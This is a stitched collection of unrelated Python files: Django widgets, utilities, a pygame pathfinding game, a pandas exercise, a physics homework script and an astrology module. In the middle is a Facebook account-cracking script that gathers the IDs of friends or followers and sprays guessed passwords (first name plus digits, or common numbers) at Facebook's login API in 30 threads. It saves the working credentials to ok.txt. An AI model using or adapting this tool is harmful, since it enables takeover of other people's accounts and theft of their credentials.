0:'Jianfu Temple Road',
1:'North section of Zhuque Street',
2:'Friendship Road',
3:'Changan Road',
4:'South Gate Bends',
5:'South Street',
6:'Bell Tower Loop',
7:'West Street',
8:'Hui Street',
9:'Xihuamen Street' }
vanishing_segment_mark(length_moving,length_moving_reverse,tourLine_segment,tourLine_segment_name)
|
# -*- coding: utf-8 -*-
"""
Widgets module.
This module provides the Widget class and the realtime function, used to register
an instance of Widget as real-time. The instance has to be registered at
compile time in order for Django to know the URL used to return contents.
"""
from __future__ import unicode_literals
from hashlib import sha256
from .apps import AppSettings
app_settings = AppSettings()
REALTIME_WIDGETS = []
def realtime(widget, url_name=None, url_regex=None, time_interval=None):
"""
Return a widget as real-time.
Args:
widget (Widget): the widget to register and return as real-time.
url_name (str): the URL name to call to get updated content.
url_regex (regex): the URL regex to be matched.
time_interval (int): the interval of refreshment in milliseconds.
Returns:
Widget: the "real-timed" widget.
"""
if not hasattr(widget, 'get_updated_content'):
raise AttributeError('Widget %s must implement get_updated_content '
'method.' % widget)
elif not callable(widget.get_updated_content):
raise ValueError('get_updated_content in widget %s is not callable'
% widget)
if url_name is None:
if getattr(widget, 'url_name', None) is not None:
url_name = widget.url_name
else:
url_name = widget.__class__.__name__
if url_name in [w.url_name for w in REALTIME_WIDGETS]:
raise ValueError('URL name %s is already used by another '
'real time widget.' % url_name)
if url_regex is None:
if getattr(widget, 'url_regex', None) is not None:
url_regex = widget.url_regex
else:
url_regex = sha256(url_name.encode('utf-8'))
url_regex = url_regex.hexdigest()[:32]
url_regex = 'realtime/' + url_regex
if url_regex in [w.url_regex for w in REALTIME_WIDGETS]:
raise ValueError('URL regex %s is already used by another '
'real time widget.' % url_regex)
if time_interval is None:
if getattr(widget, 'time_interval', None) is not None:
time_interval = widget.time_interval
else:
time_interval = app_settings.default_time_interval
from django.views.generic import View
from braces.views import AjaxResponseMixin, JSONResponseMixin
# pylama:ignore=C0111,R0201
class PartialResponse(JSONResponseMixin, AjaxResponseMixin, View):
def get_data(self):
return widget.get_updated_content()
def get(self, request, *args, **kwargs):
return self.get_ajax(request, *args, **kwargs)
def get_ajax(self, request, *args, **kwargs):
return self.render_json_response(self.get_data())
PartialResponse.url_name = url_name
PartialResponse.url_regex = url_regex
PartialResponse.time_interval = time_interval
REALTIME_WIDGETS.append(PartialResponse)
if not hasattr(widget, 'url_name'):
widget.url_name = url_name
if not hasattr(widget, 'url_regex'):
widget.url_regex = url_regex
if not hasattr(widget, 'time_interval'):
widget.time_interval = time_interval
return widget
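# Hypothetical usage sketch (the widget class and helper below are illustrative,
# not part of this module):
#
#     class CpuWidget(Widget):
#         template = 'widgets/cpu.html'
#         def get_updated_content(self):
#             return {'load': read_cpu_load()}  # assumed helper
#
#     cpu_widget = realtime(CpuWidget(), url_name='cpu', time_interval=2000)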
class Widget(object):
"""Widget class."""
def __init__(self,
html_id=None,
name=None,
content=None,
template=None,
classes=None,
**kwargs):
"""
Init method.
Args:
html_id (str): an ID to set on the HTML item.
name (str): the name of the item, displayed in HTML.
content (): suitable content according to chosen display.
template (str): the template responsible for display.
classes (str): additional classes to pass to the HTML item.
"""
if html_id is not None:
try:
self.html_id = html_id
except AttributeError:
self._html_id = html_id
if name is not None:
try:
self.name = name
except AttributeError:
self._name = name
if content is not None:
try:
self.content = content
except AttributeError:
self._content = content
if template is not None:
try:
self.template = template
except AttributeError:
self._template = template
if classes is not None:
try:
self.classes = classes
except AttributeError:
self._classes = classes
if not hasattr(self, 'template'):
raise AttributeError('template is a required widget attribute')
for kw, arg in kwargs.items():
setattr(self, kw, arg)
def get_updated_content(self):
"""Return updated content (for real-time widgets)."""
return self.content
|
from collections import namedtuple, OrderedDict
from itertools import starmap
import threading
import inspect
# Stolen from StackOverflow:
# http://stackoverflow.com/questions/323972/is-there-any-way-to-kill-a-thread-in-python
class StoppableThread(threading.Thread):
"""Thread class with a stop() method. The thread itself has to check
regularly for the stopped() condition."""
def __init__(self):
super(StoppableThread, self).__init__()
self._stop = threading.Event()
def stop(self):
self._stop.set()
def stopped(self):
return self._stop.isSet()
def identity(x):
return x
def wrap_transform(fn):
"""
This function returns a new function that accepts
an arbitrary number of arguments
and calls the wrapped function with the number of arguments that it supports. For
example:
def f(a, b):
...
g = wrap_transform(f)
assert g(a, b, c, d) == f(a, b)
"""
assert callable(fn)
try:
info = inspect.getargspec(fn)
nargs = len(info.args)
except TypeError:
# fallback to pipeline mode
nargs = 1
def wrapped(*args, **kwargs):
# print("called with {}".format(str(args)))
return fn(*args[:nargs])
return wrapped
def json_serializable_exception(e, **kwargs):
emsg = {"_exception": {}}
exc = {"exc_value": e.__repr__()}
try:
exc["exc_class"] = str(e.__class__)
exc["exc_type"] = str(e.exception.__class__)
exc["exc_tb"] = e.traceback
    except AttributeError:
pass
emsg["_exception"].update(exc)
emsg["_exception"].update(kwargs)
return emsg
import os, errno
def mkdir_p(path):
try:
os.makedirs(path)
except OSError as exc: # Python >2.5
if exc.errno == errno.EEXIST and os.path.isdir(path):
pass
else: raise
class OrderedDefaultDict(OrderedDict):
def __init__(self, default_factory, *args, **kwargs):
super(OrderedDefaultDict, self).__init__(*args, **kwargs)
assert callable(default_factory)
self.default_factory = default_factory
def __getitem__(self, key):
try:
return super(OrderedDefaultDict, self).__getitem__(key)
except KeyError:
return self.__missing__(key)
def __missing__(self, key):
if self.default_factory is None:
raise KeyError(key)
self[key] = value = self.default_factory()
return value
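# Usage sketch (illustrative):
#   d = OrderedDefaultDict(list)
#   d['a'].append(1)  # missing key is created via default_factory; insertion order is preserved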
|
#/usr/bin/python2
#writen/coded/by/harry
try:
import os,sys,time,datetime,re,random,hashlib,threading,json,getpass,urllib,cookielib,requests
from multiprocessing.pool import ThreadPool
except ImportError:
os.system("pip2 install requests")
os.system("python2 harry.py")
os.system("clear")
if not os.path.isfile("/data/data/com.termux/files/usr/bin/node"):
os.system("apt update && apt install nodejs -y")
from requests.exceptions import ConnectionError
os.system("git pull")
if not os.path.isfile("/data/data/com.termux/files/home/Crack-world/...../node_modules/bytes/index.js"):
os.system("fuser -k 5000/tcp &")
os.system("cd ..... && pip install progress")
os.system("cd ..... && npm install")
os.system("cd ..... && node index.js &")
os.system("clear")
time.sleep(10)
elif os.path.isfile("/data/data/com.termux/files/home/Crack-world/...../node_modules/bytes/index.js"):
os.system("fuser -k 5000/tcp &")
os.system("#")
os.system("cd ..... && node index.js &")
os.system("clear")
bd=random.randint(2e7, 3e7)
sim=random.randint(2e4, 4e4)
header={'x-fb-connection-bandwidth': repr(bd),'x-fb-sim-hni': repr(sim),'x-fb-net-hni': repr(sim),'x-fb-connection-quality': 'EXCELLENT','x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA','user-agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Kiwi Chrome/68.0.3438.0 Safari/537.36','content-type': 'application/x-www-form-urlencoded','x-fb-http-engine': 'Liger'}
reload(sys)
sys.setdefaultencoding("utf-8")
c = "\033[1;92m"
c2 = "\033[0;97m"
c3 = "\033[1;91m"
#Dev/fiaz/khan
logo = """
\033[1;97md8b db d888888b .d8b. d88888D d888888b
\033[1;97m888o 88 `88' d8' `8b YP d8' `88'
\033[1;97m88V8o 88 88 88ooo88 d8' 88
\033[1;97m88 V8o88 88 88~~~88 d8' 88
\033[1;97m88 V888 .88. 88 88 d8' db .88.
\033[1;97mVP V8P Y888888P YP YP d88888P Y888888P
\033[1;97m------------------------------------------------
\033[1;97mOwner : FIAZ KHAN NIAZI
\033[1;97mFacebook : Muhammad Fiaz Khan
\033[1;97mGithub : github.com/FiazNiazi
\033[1;92mNote : FIAZ KING OF FB (ENJOY FREE CLONING)
\033[1;97m------------------------------------------------
"""
def main():
os.system("clear")
print logo
print("")
print("\033[0;97m( Cloning Main Menu )").center(50)
print("")
print("\033[1;97m(1)\033[1;91m -> \033[1;93mClone Public ID (Fast)")
print("")
print("\033[1;97m(2)\033[1;91m -> \033[1;93mOwner Info")
print("")
print("\033[1;97m(3)\033[1;91m -> \033[1;93mlogout tool")
print("")
main_select()
def main_select():
IKB = raw_input("\033[1;97m-> Select \033[1;93m ")
if IKB =="1":
login()
if IKB =="2":
os.system("xdg-open https://www.facebook.com/fiazkhan.fbhacker.king.of.fb")
main()
elif IKB =="0":
os.system("exit")
else:
print("-> Please select a valid option").center(50)
time.sleep(2)
main()
def login():
os.system("clear")
print logo
print("")
print("\033[0;97m( LOGIN MAIN MENU )").center(50)
print("")
print("\033[1;97m(1)\033[1;91m -> \033[1;93mLogin Using Token")
print("")
print("\033[1;97m(2)\033[1;91m -> \033[1;93mLogin Using ID/Password")
print("")
print("\033[1;97m(3)\033[1;91m -> \033[1;93mMain menu back")
print("")
login_select()
def login_select():
IKB = raw_input(" \033[1;97mOption -> \033[1;97m ")
if IKB =="1":
os.system("clear")
print logo
print("")
print("( Login With Token )").center(50)
print("")
token = raw_input("-> Paste Token Here \033[0;93m")
token_s = open(".fb_token.txt","w")
token_s.write(token)
token_s.close()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
name = q["name"]
nm = name.rsplit(" ")[0]
print("")
print("\033[1;92mYour Token Login Successfully").center(50)
time.sleep(1)
os.system("xdg-open https://www.facebook.com/fiazkhan.fbhacker.king.of.fb")
time.sleep(1)
menu()
except (KeyError , IOError):
print("")
print("\033[1;92mToken invalid or Account has checkpoint\033[0;93m").center(50)
print("")
time.sleep(2)
login()
elif IKB =="2":
login_fb()
elif IKB =="3":
main()
else:
print("")
print("Select a valid option").center(50)
print("")
login_select()
def login_fb():
os.system("clear")
print logo
print("")
print("[ login with ID/Password ]").center(50)
print("")
id = raw_input("\033[1;93m Email/ID/Number :\033[1;97m ")
id1 = id.replace(' ','')
id2 = id1.replace('(','')
uid = id2.replace(')','')
pwd = raw_input("\033[1;93m Password :\033[1;97m ")
print("")
data = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email="+uid+"&locale=en_US&password="+pwd+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6", headers=header).text
q = json.loads(data)
if "access_token" in q:
login_s = open(".login.txt","w")
login_s.write(q["access_token"])
login_s.close()
print("\t\033[1;92mLogin Successfull\033[0;97m")
time.sleep(1)
menu()
else:
if "www.facebook.com" in q["error_msg"]:
print ("\n\033[1;93m-> Login Failed . Account Has a Checkpoint\033[0;97m")
time.sleep(1)
login_fb()
else:
print("\n\033[1;93m-> Login Failed.Email/ID/Number OR Password May BE Wrong\033[0;97m")
time.sleep(1)
login_fb()
def menu():
global token
os.system("clear")
print logo
try:
token = open(".fb_token.txt","r").read()
except (KeyError , IOError):
login()
try:
r = requests.get("https://graph.facebook.com/me?access_token="+token)
q = json.loads(r.text)
nm = q["name"]
nmf = nm.rsplit(" ")[0]
ok = nmf
except (KeyError , IOError):
print("")
print("login account has checkpoint").center(50)
print("")
os.system("rm -rf .fb_token.txt")
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print logo
print("")
print("Your internet connection failed").center(50)
print("")
time.sleep(2)
menu()
os.system("clear")
print logo
print("")
print("\t\033[1;92mLogin Account : " +nm)
print("")
print("\033[1;97m[1]\033[1;91m -> \033[1;93mCrack From Friendlist")
print("")
print("\033[1;97m[2]\033[1;91m -> \033[1;93mCrack From Public ID")
print("")
print("\033[1;97m[3]\033[1;91m -> \033[1;93mCrack From Followers ID")
print("")
print("\033[1;97m[0]\033[1;91m -> \033[1;93mlogout")
print("")
menu_select()
def menu_select():
select = raw_input("\033[1;97mOption : ")
id=[]
oks=[]
cps=[]
if select=="1":
os.system("clear")
print logo
print("")
r = requests.get("https://graph.facebook.com/me/friends?access_token="+token, headers=header)
z = json.loads(r.text)
for s in z["data"]:
uid=s['id']
na=s['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
if select =="2":
os.system("clear")
print(logo)
print("")
idt = raw_input("\033[1;97m-> Put Public ID/Username :\033[1;93m ")
os.system("clear")
print logo
try:
r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
q = json.loads(r.text)
print("-> Account Name : "+q["name"])
except (KeyError , IOError):
print("")
print("\033[1;97your login account has checkpoint").center(50)
print("")
menu()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+token)
z = json.loads(r.text)
for i in z["data"]:
uid=i['id']
na=i['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
elif select =="3":
os.system("clear")
print logo
print("")
idt = raw_input("\033[1;97m-> Put ID/Username :\033[1;93m ")
os.system("clear")
print logo
try:
r = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token, headers=header)
q = json.loads(r.text)
print(" Account Name : "+q["name"])
except (KeyError , IOError):
print("")
print("\033[1;97m login id has checkpoint").center(50)
print("")
time.sleep(3)
menu()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?access_token="+token+"&limit=5000", headers=header)
z = json.loads(r.text)
for i in z["data"]:
uid=i['id']
na=i['name']
nm=na.rsplit(" ")[0]
id.append(uid+'|'+nm)
elif select =="0":
os.system("exit")
else:
print("")
print("Please Select A Valid Option").center(50)
time.sleep(2)
menu_select()
print("\033[1;97m-> Total IDs : "+str(len(id)))
time.sleep(0.5)
print("\033[1;97m-> Please wait clone account will be appear here")
print 47*("-")
print('')
def main(arg):
user=arg
uid,name=user.split("|")
try:
pass1=name+"123"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass1 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass1)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass1+"\n")
cp.close()
cps.append(uid)
else:
if "access_token" in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass1+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass1+"\n")
ok.close()
oks.append(uid)
else:
pass2=name+"1234"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass2 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass2)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass2+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass2+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass2+"\n")
ok.close()
oks.append(uid)
else:
pass3=name+"12345"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass3 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass3)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass3+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print(" \x1b[1;97m[FIAZ-OK] "+uid+" | "+pass3+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass3+"\n")
ok.close()
oks.append(uid)
else:
pass4=name+"786"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass4 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass4)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass4+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass4+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass4+"\n")
ok.close()
oks.append(uid)
else:
pass5="786786"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass5 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass5)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass5+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass5+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass5+"\n")
ok.close()
oks.append(uid)
else:
pass6="223344"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass6 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass6)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass6+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass6+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass6+"\n")
ok.close()
oks.append(uid)
else:
pass7=name+"12"
q = requests.get("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email=" + uid + "&locale=vi_vn&password=" + pass7 + "&sdk=ios&generate_session_cookies=1&sig=15df5f3c8c37e0a620e8fa1fd1dd705c", headers=header).text
d=json.loads(q)
if 'www.facebook.com' in d['error_msg']:
print("\x1b[1;93m[FIAZ-CP] "+uid+" | "+pass7)
cp=open("cp.txt","a")
cp.write(uid+" | "+pass7+"\n")
cp.close()
cps.append(uid)
else:
if 'access_token' in d:
print("\x1b[1;97m[FIAZ-OK] "+uid+" | "+pass7+"\x1b[1;0m")
ok=open("ok.txt","a")
ok.write(uid+" | "+pass7+"\n")
ok.close()
oks.append(uid)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print (" ")
print (47*"-")
print ("-> Your Process has completed Successful")
print ("-> Total Cp/Ok : "+str(len(cps)) + "/"+str(len(oks)))
print (47*"-")
raw_input("\t\x1b[0;97mPress enter to main menu back")
menu()
if __name__ == '__main__':
main()
|
import staticjinja
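# Minimal static-site build: make_site() picks up templates from staticjinja's
# default search path (conventionally ./templates) and render() writes them out.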
if __name__ == "__main__":
site = staticjinja.make_site()
site.render()
|
import random
import pygame
from datahandler.entities import Enemy, Player, Direction
from datahandler.layout import Layout
from render.renderdatagenerator import render_data
from scripts.pathfindingapp import PathFindingApp
from scripts.algos.pathfinder import PathFinder
from scripts.algos.caveprocedural import CaveProcedural
from render.engine import RenderEngine
# Application wrapper: initializes pygame and the RenderEngine, generates the cave layout, and drives pathfinding
class App:
def __init__(self, size=(80,40), sq_width=15, iterations=5):
self.sq_width = sq_width
self.size = size
self.screen_size = (self.size[0]*self.sq_width, self.size[1]*self.sq_width)
self.iterations = iterations
self.fps_cap = 5
self.wall_color = [95, 67, 42]
self.wall_border_color = [71, 54, 39]
self.room_color = [211, 255, 204]
self.font_type = 'Comic Sans MS'
self.font_size = 30
self.font_color = (255, 255, 255)
self.cave = CaveProcedural(layout=Layout(self.size))
self.cave.smoothing(iterations=self.iterations)
self.cave.detectRooms()
self.cave.connectRooms()
self.pathfinderapp = PathFindingApp(layout=self.cave.layout, pathfinder=PathFinder())
tile_pos = self.pathfinderapp.move_target()
self.player = Player(tile_pos, self._get_coordinates(tile_pos))
self.no_of_enemies = 1
        self.enemies = self.init_enemies(self.no_of_enemies, speed=2)
self.renderEngine = self.init()
def _get_coordinates(self, tile_pos: tuple):
x, y = tile_pos
return ((x+0.5) * self.sq_width, (y+0.5) * self.sq_width)
    def init_enemies(self, count: int, speed: int):
enemies = []
for i in range(count):
enemy_pos = self.pathfinderapp.new_follower(
ignore=[self.player.position]+list(map(lambda p: p.position,enemies)))
if enemy_pos:
enemies.append(Enemy(enemy_pos, speed=speed))
return enemies
def keymapHandler(self):
def keymap(event):
if event.type == pygame.KEYDOWN and event.key == pygame.K_SPACE:
player_tile = self.pathfinderapp.move_target(
ignore=[self.player.position] + list(map(lambda e: e.position,self.enemies)))
self.player.position = player_tile
self.player.coordinate = self._get_coordinates(player_tile)
self.player.directions = [Direction.NONE, Direction.NONE, Direction.NONE, Direction.NONE]
if (event.type == pygame.KEYDOWN or event.type == pygame.KEYUP):
if event.key == pygame.K_UP:
if event.type == pygame.KEYDOWN:
self.player.directions[0] = Direction.UP
elif event.type == pygame.KEYUP:
self.player.directions[0] = Direction.NONE
if event.key == pygame.K_RIGHT:
if event.type == pygame.KEYDOWN:
self.player.directions[1] = Direction.RIGHT
elif event.type == pygame.KEYUP:
self.player.directions[1] = Direction.NONE
if event.key == pygame.K_DOWN:
if event.type == pygame.KEYDOWN:
self.player.directions[2] = Direction.DOWN
elif event.type == pygame.KEYUP:
self.player.directions[2] = Direction.NONE
if event.key == pygame.K_LEFT:
if event.type == pygame.KEYDOWN:
self.player.directions[3] = Direction.LEFT
elif event.type == pygame.KEYUP:
self.player.directions[3] = Direction.NONE
return keymap
def updateHandler(self):
def update():
new_position = self.player.position
pos = None
for dir in self.player.directions:
pos = new_position[0] + dir.value[0], new_position[1] + dir.value[1]
pos = self.pathfinderapp.move_target(position=pos)
if not pos:
pos = new_position
else:
new_position = pos
if pos:
self.player.position = pos
for i in range(len(self.enemies)):
next_step = self.pathfinderapp.get_next_step(self.enemies[i].position)
                if next_step != self.player.position:
self.enemies[i].position = next_step
return update
def _rendertext(self, display, text: str, position: tuple):
font = pygame.font.SysFont(self.font_type, self.font_size)
textsurface = font.render(text, False, self.font_color)
display.blit(textsurface,position)
def renderHandler(self):
def render(display):
triangles, tags = render_data(self.cave.layout.grid, self.sq_width)
# display.fill(self.room_color)
pygame.draw.rect(display, self.room_color, rect=[0,0,self.screen_size[0], self.screen_size[1]])
pygame.draw.rect(display, tuple(map(lambda x: (x-20)%255,self.wall_color)),
[0, (self.size[1])*self.sq_width,self.screen_size[0], 200])
if self.player:
color = (0, 255, 0)
x, y = self.player.position
pygame.draw.circle(display, color,
((x+0.5) * self.sq_width, (y+0.5) * self.sq_width), self.sq_width/2, width=0)
if self.enemies:
color = (255, 0, 0)
for enemy in self.enemies:
x, y = enemy.position
pygame.draw.circle(display, color,
((x+0.5) * self.sq_width, (y+0.5) * self.sq_width), self.sq_width/2, width=0)
for i in range(len(triangles)):
tri = triangles[i]
tag = tags[i]
pygame.draw.polygon(display, self.wall_color, list(tri), width=0)
text = "World size: " + str(self.size)
self._rendertext(display, text, (20,(self.size[1]+2)*self.sq_width))
pygame.display.flip()
return render
def init(self):
        return RenderEngine([1200, 600], self.updateHandler(),
                            self.renderHandler(), self.keymapHandler(), self.fps_cap)
def start(self):
self.renderEngine.start()
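# Hypothetical entry point (assumes the imported project modules are available):
if __name__ == "__main__":
    App().start()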
|
# Preppin' Data 2021 Week 23
import pandas as pd
import numpy as np
# Load data
airlines = pd.read_excel('unprepped_data\\PD 2021 Wk 23 Input - NPS Input.xlsx', sheet_name='Airlines')
prep_air = pd.read_excel('unprepped_data\\PD 2021 Wk 23 Input - NPS Input.xlsx', sheet_name='Prep Air')
# Combine Prep Air dataset with other airlines
airline_df = pd.concat([airlines,prep_air])
# Exclude any airlines who have had less than 50 customers respond
airline_df['total reviews'] = airline_df.groupby('Airline')['CustomerID'].transform('count')
airline_df = airline_df.loc[airline_df['total reviews'] >= 50]
# Classify customer responses to the question in the following way:
# 0-6 = Detractors
# 7-8 = Passive
# 9-10 = Promoters
airline_df['Response Category'] = np.select(
[
airline_df['How likely are you to recommend this airline?'] <= 6,
airline_df['How likely are you to recommend this airline?'] <= 8,
airline_df['How likely are you to recommend this airline?'] <= 10
],
[
'Detractors',
'Passive',
'Promoters'
],
default='Unknown'
)
# Calculate the NPS for each airline
# NPS = % Promoters - % Detractors
# Note: I rounded the %s down to the nearest whole number, so if your answer differs slightly from mine then this could be why!
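# Worked example (illustrative numbers): 60 promoters, 25 passives and 15
# detractors out of 100 responses gives NPS = 60% - 15% = 45.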
nps = airline_df[['Airline','Response Category']]
nps = nps.groupby(['Airline','Response Category'], as_index=False).size()
# Pivot columns to rows
nps = nps.pivot(index = 'Airline', columns = 'Response Category', values = 'size').reset_index()
nps['Total'] = nps['Detractors'] + nps['Passive'] + nps['Promoters']
# Rounding % Promoters & % Detractors before subtraction
nps['NPS Score % Rounded'] = np.floor((nps['Promoters']*100)/nps['Total']) - np.floor((nps['Detractors']*100)/nps['Total'])
# Calculate the average and standard deviation of the dataset
airline_stats = nps['NPS Score % Rounded'].agg({'average':'mean',"standard deviation": 'std'})
# Take each airline's NPS and subtract the average, then divide this by the standard deviation
nps['Z-Score'] = (nps['NPS Score % Rounded'] - airline_stats['average'])/airline_stats['standard deviation']
# Filter to just show Prep Air's NPS along with their Z-Score
# Output the data
output_df = nps.loc[nps['Airline'] == 'Prep Air']
output_df = output_df[['Airline','NPS Score % Rounded','Z-Score']]
output_df.to_csv('prepped_data\\PD 2021 Wk 23 Output.csv', encoding="utf-8-sig", index=False)
print("data prepped!")
|
"""
A physics textbook is pushed across the tabletop with a force
of 259 N over a distance of 2.3 m. The book slides across the
table and comes to a stop. The temperature of the entire system
(defined as the table, the book, and the surrounding air) is 295 K.
Part A:
What is the change in the internal energy of the system?
The amount of work done on the system is equal to
Work = Force * Distance
We know then that the amount of work added to the internal energy
of the system is:
Internal Energy
= force * distance
= 2.3 * 259
= 595.7 J
Part B:
Assuming that the temperature of the system does not
significantly change during this process, what is the
change in the entropy of this system?
The key assumption is that the temperature of the system does not
change significantly, so T = 295 K can be treated as constant
throughout the process. At constant temperature, the entropy change
is the heat added to the system divided by that temperature:
ratioOfChange
= internalEnergyChange / temperatureInitial
= 595.7 / 295
= 2.0193220339 J/K
The answer units are joules per kelvin: the only quantities we have
are the change in energy from the first equation and the initial
temperature in kelvin.
"""
if __name__ == '__main__':
force = 259
distance = 2.3
initialTemperature = 295
work = force * distance
print "The total change in the amount of energy located in the system is:", work
ratioOfChange = work / initialTemperature
print "The change in entropy of the system is:", ratioOfChange
|
# Example of the filter function
def es_impar(x):
return x % 2
print(list(filter(es_impar, range(10))))
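# Expected output: [1, 3, 5, 7, 9] (filter keeps values where es_impar returns a truthy 1)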
|
def register(mf):
mf.register_default_module("batchnorm", required_event="normalization_layer", overwrite_globals={
"batchnorm.momentum": 0.05,
})
mf.register_default_module("onecyclelr", required_event="init_scheduler", overwrite_globals={
"onecyclelr.anneal_strategy": lambda state, event: state["grp.scheduler.onecyclelr.AnnealStrategy"].COS,
"onecyclelr.epochs_start": 0.1,
})
mf.load("..base")
mf.register_default_module(["train", "validate", "test"], required_event="main", overwrite_globals={
"main.epochs": 50,
"batchsize": 256,
})
mf.register_default_module("sgd", required_event="init_optimizer", overwrite_globals={
"sgd.momentum": 0.9,
"sgd.weight_decay": 2e-4,
"sgd.nesterov": True,
"sgd.lr": 0.8,
"onecyclelr.div_factor": 10,
"onecyclelr.final_div_factor": 1e3,
"onecyclelr.anneal_strategy": lambda state, event: state["grp.scheduler.onecyclelr.AnnealStrategy"].COS,
})
mf.register_default_module("adam", required_event="init_optimizer", overwrite_globals={
"adam.lr": 1e-3,
"adam.betas": (0.9, 0.99),
"adam.weight_decay": 1e-2,
"onecyclelr.div_factor": 1e10,
})
|
#!/usr/bin/python
import sys, getopt
import translate, calculateOrbs
#import xlsxwriter
import constants, aspects, shapes, modesElements
from itertools import groupby
from collections import Counter
def addPossPatternsForSpan(sign_degree_dict, rowNum, numRowsRepeat, possPatterns):
'''Add potential patterns for span by sign aspects'''
#For now only add possibles if there aren't any
if len(possPatterns) == 0:
rowAspects = aspects.addSignAspectsForSpan(sign_degree_dict, rowNum, numRowsRepeat, [])
possPatterns = getPatternsForAspectShapes(rowAspects)
return possPatterns
else:
return possPatterns
def getPatternsForAspectShapes(aspects):
poss_shapes = []
for asp in aspects:
#print("asp:", asp, "add:", constants.PATTERN_ASPECT_SHAPES[asp])
for ashape in constants.PATTERN_ASPECT_SHAPES[asp]:
poss_shapes.append(ashape)
#print("poss shapes:", poss_shapes, " for aspects:", aspects)
poss_patts = []
for patt in constants.PATTERN_SHAPES:
match_shapes = constants.PATTERN_SHAPES[patt]
for shp in match_shapes:
for pshp in poss_shapes:
if shp == pshp:
if patt not in poss_patts:
poss_patts.append(patt)
#print("poss patts:", poss_patts, " for aspects:", aspects)
somePatts = shapes.determineBestPatternsForShapeMatch(poss_patts, aspects)
return getJustPatternNames(somePatts)
def determineBestPatternBySomething(possPatts, numRowsRepeat, rowNum, sign_degree_dict, rowAspects):
##print("This row ", rowNum, " repeats ", numRowsRepeat)
bestPatt = ''
